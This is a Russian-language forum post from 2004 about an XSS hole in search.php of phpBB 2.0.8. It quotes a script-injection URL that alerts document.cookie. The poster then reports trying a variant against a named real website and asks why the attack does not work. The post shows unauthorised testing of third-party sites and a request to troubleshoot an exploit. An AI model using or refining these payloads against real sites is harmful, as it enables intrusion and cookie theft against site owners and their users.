05.08.2004, 15:28
|
|
Guest
Сообщений: n/a
С нами:
Репутация:
|
|
Xss в phpBB 2.0.8
В phpBB 2.0.8 есть уязвимость в search.php и показан пример </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Цитата </td></tr><tr><td id="QUOTE">http://www.example.com/phpBB2/search.php?search_author='<script>alert(documen t.cookie)</script>[/QUOTE]<span id='postcolor'>
проверал на саитах но не на одново неработает, например:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Цитата </td></tr><tr><td id="QUOTE">http://www.bpmdigitaldjgear.com/phpBB2/search.php?search_author='<script>alert('kkl'  ;</script>[/QUOTE]<span id='postcolor'>
помогите, что делаю нетак? |
|
|
|